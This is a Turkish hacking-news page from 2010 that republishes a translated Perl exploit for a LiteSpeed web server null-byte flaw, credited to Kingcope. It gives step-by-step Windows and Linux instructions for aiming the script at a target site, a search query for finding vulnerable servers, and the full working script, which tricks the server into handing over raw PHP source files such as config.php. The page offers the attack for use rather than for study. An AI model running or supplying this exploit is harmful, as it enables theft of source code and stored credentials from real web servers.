Güncel Haber - Litespeed Açığı - Hack Haber Hacktebugun Tarafsız Hack Haber

Litespeed Açığı

Yazı Boyutu

Tarih : 13.07.2010 - 08:05:57

Litespeed Açığı Türkçe

Açığın Orjinal ismi : Litespeed Technologies Web Server Remote Poison null byte Exploit
Açığın Türkçe ismi : Litespeed Web server Uzaktan Zehirleme
Açığı bulan kişi : Kingcope
Açığın Yaptığı: Açıklar Sadece Site scriptlerinde değil Bazende Sitelerin Bulunduğu Web Serverlarda oluyor Bu açık ile config.php ve index.php Gibi dosyaları bilgisayarımıza çekiyor yani bize .php 'yi download etme şansı veriyor
Türkçeleştirme : Madconfig
Web Server nedir: Web Server Bir Serverın Yayın Yonetmenidir. Web sunucusu ya da ağ sunucusu, İnternet üzerinde bir web sitesinin yayınından sorumlu olan sunucudur. HTTP başta olmak üzere HTTPS, FTP, SMTP, POP3, DNS ve hatta gerçek zamanlı veri akışı (streaming media) hizmeti veriyor olabilir.

Exploit Anlatımı : Exploiti Kullanabilmek için Bilgisayarınızda Perl Yüklü olmalıdır

Exploitin Windows işletim sisteminde kullanımı şu dur ;

lite.pl olarak kaydedin Exploiti ve C:/Perl/bin Klasörüne atın

sonra Başlat > çalıştır > CMD yazıp enterlayın

gelen MS-DOS ekranına

cd.. komutu verin bu işlemi C:/ dizinine inene kadar Tekrarlayın

C:> < bunu görünce cd Perl/bin yazip enterlayın daha sonrasindan PHP- Kodu:

perl lite.pl www.hedefsite.com index.php

yazip
entera basin eğer açık varsa exploit PHP- Kodu:

www.hedefsite.com-index.php

olarak indirecektir index.php'yi daha sonrasında Exploit 'in bulunduğu dizindeki dosyayı okumanız yeterlidir

Linux için kullanımı :

exploiti masaüstünüze lite.pl olarak kaydedin

Terminali açın cd Masaüstü yazip enterlayın

perl  lite.pl www.hedefsite.com index.php

yazip enterlayın

cat  www.hedefsite.com-index.php

Exploit :

#!/usr/bin/perl
#
#Litespeed Uzaktan Zehirleme
#Bulan Kingcope
#Google Araması: ""Proudly Served by LiteSpeed Web Server""
#Türkçeleştirme: Madconfig ~ Wordlhackerz.com
#Haziran  2010
#Fikri verdigi için Milw0rm'a Teşekkürler

use IO::Socket;
use strict;

sub getphpsrc {
my $host = shift;
my $file = shift;

if (substr($file, 0, 1) eq "/") {
$file = substr($file, 1);
}
my $file2 = $file;
$file2 =~ s///_/g;
print "Kodlar  kaydedildi $file > $host-$file2\n";

my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort =>  '80',
Proto => 'tcp') || die("Baglanti saglanamadi $ARGV[0]");

print $sock "GET  /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection:
close\r\n\r\n";

my $buf = "";

my $lpfound = 0;
my $saveme = 0;
my $savveme = 0;
while(<$sock>)  {
if ($_ =~ /LiteSpeed/) {
$lpfound = 1;
}

if ($saveme ==  2) {
$savveme = 1;
}

if ($saveme !=  0 && $savveme == 0) {
$saveme++;
}

if ($_ =~ /Content-Length:/) {
$saveme = 1;
}

if ($savveme ==  1) {
$buf .= $_;
}
}

if ($lpfound ==  0) {
print "Litespeed Server olmaya bilir yinede  acik Dosya kaydedildi.\n";
}

open FILE, ">$host-$file2";
print FILE $buf;
close FILE;
print "Tamamlandi.\n";
}

print "Litespeed Uzaktan Zehirleme\n";
print "Acıgı Bulan Kingcope\n";

print "Turkcelestirme Madconfig ~  www.worldhackerz.com\n";
print " Haziran 2010\n\n";

if ($#ARGV != 1) {
print "Kullanımı:  perl lite.pl <domain/ip> <php dosyasi>\n";
print "Ornek: perl lite.pl www.worldhackerz.com index.php\n";
exit(0);
}

getphpsrc($ARGV[0], $ARGV[1]);

print "İşlem Tamamlandı ~ Türkçeleştirme  madconfig :>.\n";

Editör : admin

Yazdır

Word'e Aktar

Yorum Ekle

Tavsiye

Puan Yok

Kaynak : admin

Kategori Güncel Haber

808 Kişi Tarafından Okundu.

Yorum ( 1 )

HİLESİZ

Tarih : 26.07.2010 00:21:56

Buda İYi

Cevapla

Bence Bunu yapana kadar Ruby yöntemı kesın çözum ;)

İp Adresi Kayıtlı

Sayfa

Bu Kateoriye Ait Diğer Başlıklar

	Duyuru

Köşe Yazıları

C-Root

C-Root ¬

Yazı Eklenmemiş

Her gün Birini...

Cevap ; Dikkatsizlik ve sonucları

Nameless Malmısın Nesin

Cevap ; :) Fake Fake Fake NO

Tuzak ya BUnların hepsi

UlükücüTeam Sahnede medciwan.net

8 PKKLI HACKLENDİ

8 PKKLI HACKLENDİ
8 PKKLI HACKLENDİ...

Thelargest Rüzgarı Sanalı Kavuruyor

Kadın Yuttaş Ağı Hacklendi

Facebook yine iş başında

30 yıl sonra gelen ilginç keşif

İnternette girilen bilgiler silinebilirmi?

Microsoft: HTML5i dövüyoruz

50 mükemmel ipucu ile Windows 7yi uçuruyoruz

İlk uzay üniversitemiz kuruluyor

İnternet adreslerinin geleceği